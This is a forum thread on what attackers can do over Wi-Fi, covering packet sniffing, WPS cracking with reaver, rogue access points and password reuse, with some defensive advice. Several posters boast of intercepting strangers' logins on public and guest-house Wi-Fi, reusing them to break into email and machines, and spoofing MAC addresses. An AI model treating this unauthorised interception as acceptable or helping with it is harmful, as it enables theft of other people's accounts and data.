Hacking through WIFI: what is possible?

[FNfal]

https://www.kismetwireless.net/
https://www.wireshark.org/
As mentioned whatsapp , the key is on the phone so you have to get at the phone to get the key to decrypt whatsapp .

 

[Edwe]

LOL.

You think people type passwords? It's all automated buddy. When you open www.gmail.com or whatever it's just sent through again and the data is right there is the packet.

Typing it isn't the problem, it's the fact that it's generally cached already and gets sent hundreds of times back and forth.

I'm not sure I follow here. Surely, if you are already logged in, the password is not sent as clear-text but encrypted (SSL/TLS), except on broken sites? On most proper sites (e.g. Gmail, Facebook) even the session cookies are encrypted (I verified this with Wireshark), so even if somebody is sniffing your packets, how can they use this to get your password or even hijack your session?

 

[gregmcc]

If you are seriously interested you'll want to look at doing the CEH - Certified Ethical Hacker courses but be warned it is one the hardest exams in IT. You also need to be a little bit off your rocker...every single CEH or aspiring CEH I know is a bit of a whack job.

I found the CEH one of the most fun exams I've written. I mean where else do you get look at network dumps and say what exploit is being used

The CISSP on the other hand was one of the most difficult exams I've written - this requires weeks and weeks of reading

 

[Alacrity]

If your neighbor wants to use your Wi-Fi and you have WPS enabled he will have your WPA/WPA2 passphrase in less than 8 hours with reaver-wps...

 

[MagicDude4Eva]

LOL.

You think people type passwords? It's all automated buddy. When you open www.gmail.com or whatever it's just sent through again and the data is right there is the packet.

Typing it isn't the problem, it's the fact that it's generally cached already and gets sent hundreds of times back and forth.

Nope. The password is not sent again. The login-/session cookies are and typically it's done via HTTPS. The "only" way this can be intercepted is via man-in-the-middle attacks or session hijacking, but the hacker will never know the password. There is an exception, and this is when you run for example a rogue Wifi access point / honeypot (such as the Wifi Pineapple - https://www.wifipineapple.com/) where the rogue AP will just rewrite HTTP requests to non-SSL and hence get your passwords.

This is even more an issue on mobile phones which hide the browser's address-bar.

 

[SauRoNZA]

Nope. The password is not sent again. The login-/session cookies are and typically it's done via HTTPS. The "only" way this can be intercepted is via man-in-the-middle attacks or session hijacking, but the hacker will never know the password. There is an exception, and this is when you run for example a rogue Wifi access point / honeypot (such as the Wifi Pineapple - https://www.wifipineapple.com/) where the rogue AP will just rewrite HTTP requests to non-SSL and hence get your passwords.

This is even more an issue on mobile phones which hide the browser's address-bar.

Yes it's mostly HTTPS.

"Typical" is not the one that catches you though...it's the rest.

Which is why I made the point that the worst problem is that one little service that isn't as secure which uses the same password as everything else.

In the case of pop3/imap I do believe the username/password is sent every time and that's normally what's easy to intercept.

Also many people stupidly choose not to remain logged in, but then use an saved password system anyway which does send all the username/password information each time they click login from the logon screen.

Not to mention the porn site logins I've intercepted are always entered manually for obvious reasons. So you simply grab that password and use it with the usernames you've picked up from other services and half the time they work.

 

[MagicDude4Eva]

So you simply grab that password and use it with the usernames you've picked up from other services and half the time they work.

That is the biggest problem. Most people only use one "secure" password for everything. Best option is to use machine generated passwords (such as via 1Password) and 2FA (two-factor authentication) and there is no issue. Only downside is that if your password to your password manager is compromised or you forget your 2FA backup codes you are pretty much toast.

 

[SauRoNZA]

Yeah. When i was on OSX it was Keychain only.


Now I'm a bit lost on Windows.

 

[Odly]

@SauRoNZA It sounds like you have been doing what I was thinking of researching and doing at the airport while I wait for my plane. This makes me more curious to have a look into all of this any pointers?

I'm so surprised by all the always-on hotspots out there, it would be so easy to create a rouge and just capture all the incoming traffic and then you have this movement to put Wifi in taxi's...SA people really don't seem to take security seriously.

On a side note, hiding your SSID is not a form of security because the PC or phone that is set to connect is then consistently sending out a request to connect to the SSID just in case it in in range...

 

[Rocket-Boy]

Trust me it's amazing how much I've intercepted in a mere 15 minutes at the airport hotspots on many occasions when flying for business....and I'm an amateur.

Most recently I was away for business and stayed at a guest house with free wifi. By the second evening I had access to someone else's email, porn sites (yes they paid for them) and direct access to their machine and all the data on it purely because they were stupid enough to use the same password everywhere.

Your best defense against this is using 2-stage authentication on every service that offers it.

I used to do that a while ago when I was waiting for flights.
All kinds of stuff visible on those networks.
Interestingly enough if you pick up the mac of someone that has paid to use to AP then you can spoof your address to be the same and you get free internets.

 

[SauRoNZA]

Yup, very simple to do that if you have the software loaded before hand to do so.

Not so simple running Backtrack as your primary OS and not get people looking at you a bit funny...or worse still interested because it's non-windows and non-OSX which is all they know.

 

[hackerjargon]

Also remember to disable WPS.

That's why I like to install openwrt firmware, wps even if disabled on some devices can still be give the attacker full access

 

[hackerjargon]

You aren't that important, nobody cares about your home network. (I'm not saying make your WPA2 key 123456 or leave it wide open) and nobody is going to park outside your house and use a long range wireless sniffer to try and crack your network.

Well, if someone has say, a (cpe) ubiquity/tp-link/routerboard/etc.. or a good wifi grid/patch panel (connected to wifi card/usb wifi dongle) outside and pointed to someone's house with adsl or something and it's easily accessed/or open. They have free internet from your home connection. So securing your home router is important in my opinion. In today's society, wifi is everywhere and with a good antenna, you can access someone's home network from 30km away.

 

[SauRoNZA]

Well, if someone has say, a (cpe) ubiquity/tp-link/routerboard/etc.. or a good wifi grid/patch panel (connected to wifi card/usb wifi dongle) outside and pointed to someone's house with adsl or something and it's easily accessed/or open. They have free internet from your home connection. So securing your home router is important in my opinion. In today's society, wifi is everywhere and with a good antenna, you can access someone's home network from 30km away.

Like I said, I'm not advocating leading it wide open or anything like that.

But you also don't need a 256 character cypher as wireless key.

 

[slvR]

/tinfoil hat

hek0r pls no hek0rino

 

[Odly]

/tinfoil hat

hek0r pls no hek0rino

LOL'd

 

[TheTwo]

Teach Meeeeee Mr Miyagi

I wanna be your Daniel-son

Yes it's mostly HTTPS.

"Typical" is not the one that catches you though...it's the rest.

Which is why I made the point that the worst problem is that one little service that isn't as secure which uses the same password as everything else.

In the case of pop3/imap I do believe the username/password is sent every time and that's normally what's easy to intercept.

Also many people stupidly choose not to remain logged in, but then use an saved password system anyway which does send all the username/password information each time they click login from the logon screen.

Not to mention the porn site logins I've intercepted are always entered manually for obvious reasons. So you simply grab that password and use it with the usernames you've picked up from other services and half the time they work.

 

[SauRoNZA]

Teach Meeeeee Mr Miyagi

I wanna be your Daniel-son

I think you should be asking hackerjargon he seems to be Pro at this.

I've just dabbled.

 

[hackerjargon]

I think you should be asking hackerjargon he seems to be Pro at this.

I've just dabbled.

I'm a pro at nothing.. I just know how to google

Information Security is a fun 'hobby'

 

[TheTwo]

I think you should be asking hackerjargon he seems to be Pro at this.

I've just dabbled.

Yes but.. Not everyone wants to share. I've found some build up this silly ego thing about it. Self-righteous grin and tell me to learn myself. I'm too daft to learn on my own. Wanna be shown and ask questions